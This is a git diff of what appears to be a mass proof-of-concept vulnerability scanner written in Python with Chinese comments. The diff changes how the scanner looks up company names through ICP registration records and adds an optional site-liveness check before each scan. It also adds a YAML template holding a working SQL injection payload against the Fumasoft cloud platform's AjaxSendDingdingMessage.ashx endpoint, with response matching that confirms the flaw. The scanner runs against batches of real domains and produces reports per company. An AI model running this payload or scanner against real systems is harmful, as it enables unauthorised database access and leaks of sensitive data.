diff --git a/new_poc_tools.py b/new_poc_tools.py index 5f2f284..b172448 100644 --- a/new_poc_tools.py +++ b/new_poc_tools.py @@ -7,6 +7,7 @@ import urllib.parse import sys import docx import os +import re import warnings import requests import argparse @@ -48,11 +49,15 @@ def get_company_name(url): soup = BeautifulSoup(response.content, 'html.parser') # 查找公司名称的标签 - company_name_tag = soup.find('a', id='companyName') + company_name_tag = soup.find('div', {'tag': 'company_name'}) # 提取公司名称 if company_name_tag: - return company_name_tag.text + text = company_name_tag.text + cleaned_text = re.sub(r'[^\w\s]', '', text) # 去除英文符号 + cleaned_text = re.sub(r'\s+', ' ', cleaned_text).strip() # 去除多余空格和换行符 + return cleaned_text + # return company_name_tag.text else: print("公司名称未找到") return None @@ -100,9 +105,9 @@ def create_document(): def extract_root_domain(url): extracted = tldextract.extract(url) root_domain = f"{extracted.domain}.{extracted.suffix}" - encoded_bytes = base64.b64encode(root_domain.encode('utf-8')) - encoded_str = encoded_bytes.decode('utf-8') - return urllib.parse.quote(encoded_str) + # encoded_bytes = base64.b64encode(root_domain.encode('utf-8')) + # encoded_str = encoded_bytes.decode('utf-8') + return urllib.parse.quote(root_domain) def add_scan_results_to_document(document, domain, results, include_all, description, choice_3): for name, result, status_code, url, res_time in results: @@ -117,7 +122,8 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip if result == "存在漏洞" and choice_3 == "y": screenshot_path_1 = screenshot(url) # print(screenshot_path_1) - screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain)) + # 站长工具反爬,该截图已废弃 + # screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain)) # print(screenshot_path_2) #word处理部分 #导入模板 @@ -136,33 +142,42 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip run = paragraph.add_run() if screenshot_path_1: run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片 - run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加图片 + # run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加ICP备案图片,已废弃寻找新方法 doc_save_path = './file/result/' if not os.path.exists(doc_save_path): os.mkdir(doc_save_path) #保存word,根据需要自行更改 - company_name = get_company_name("https://icp.chinaz.com/" + domain) + company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain)) doc_name = str(company_name) + "_" + name + ".docx" doc.save(doc_save_path + doc_name) -def mass_poc_scan(domains, include_all, choice_2, docx_name): +def mass_poc_scan(domains, include_all, choice_2, docx_name, status): document = create_document() try: for domain in domains: logging.info(f"正在扫描域名:{domain}") - if not check_url_status(domain): - logging.warning(f"访问失败,跳过当前域名的扫描:{domain}") - print("--------------------------------------------------") - if choice_2.lower() == 'n': - document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3 - continue + if status == 'y': + if not check_url_status(domain): + logging.warning(f"访问失败,跳过当前域名的扫描:{domain}") + print("--------------------------------------------------") + if choice_2.lower() == 'y': + document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3 + continue - try: - results, description = validate_main(domain) - add_scan_results_to_document(document, domain, results, include_all, description, choice_3) - except Exception as e: - logging.error(f"扫描域名 {domain} 时出错:{e}") - print("--------------------------------------------------") + try: + results, description = validate_main(domain) + add_scan_results_to_document(document, domain, results, include_all, description, choice_3) + except Exception as e: + logging.error(f"扫描域名 {domain} 时出错:{e}") + print("--------------------------------------------------") + + else: + try: + results, description = validate_main(domain) + add_scan_results_to_document(document, domain, results, include_all, description, choice_3) + except Exception as e: + logging.error(f"扫描域名 {domain} 时出错:{e}") + print("--------------------------------------------------") except KeyboardInterrupt: print(Fore.RED +'\n检测到Ctrl+C,中断程序。' + Fore.RESET) save_document(document, docx_name) @@ -191,6 +206,7 @@ if __name__ == "__main__": file_path = "./urls.txt" include_all = False choice_3 = 'y' + status = 'y' else: # 交互模式 choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower() @@ -203,6 +219,8 @@ if __name__ == "__main__": print("--------------------------------------------------") domains = extract_domains_from_file(file_path) + status = input(Fore.BLUE + "请问是否需要检查目标网站存活状态?(y/n): " + Fore.RESET).lower() + print("--------------------------------------------------") choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower() include_all = choice_2 != 'y' print("--------------------------------------------------") @@ -212,9 +230,13 @@ if __name__ == "__main__": # 执行扫描 domains = extract_domains_from_file(file_path) if args.batch: - mass_poc_scan(domains, include_all, choice_3, args.name) + mass_poc_scan(domains, include_all, choice_3, args.name, status) else: docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤):" + Fore.RESET) print("--------------------------------------------------") - mass_poc_scan(domains, include_all, choice_3, docx_name) - \ No newline at end of file + mass_poc_scan(domains, include_all, choice_3, docx_name, status) + +# if __name__ == "__main__": +# domain = 'http://vr.sh-fit.com:9090' +# company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain)) +# print(company_name) \ No newline at end of file diff --git a/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml b/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml new file mode 100644 index 0000000..cd800ca --- /dev/null +++ b/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml @@ -0,0 +1,30 @@ +keyword: fumasoft +name: 孚盟云平台存在SQL注入漏洞 +description: | # 下一行可填写漏洞描述 + 孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。 +requests: # 为空代表默认或者不启用 + path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx" + method: POST + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+ + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "Copyright" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞,可能导致数据库敏感信息泄露。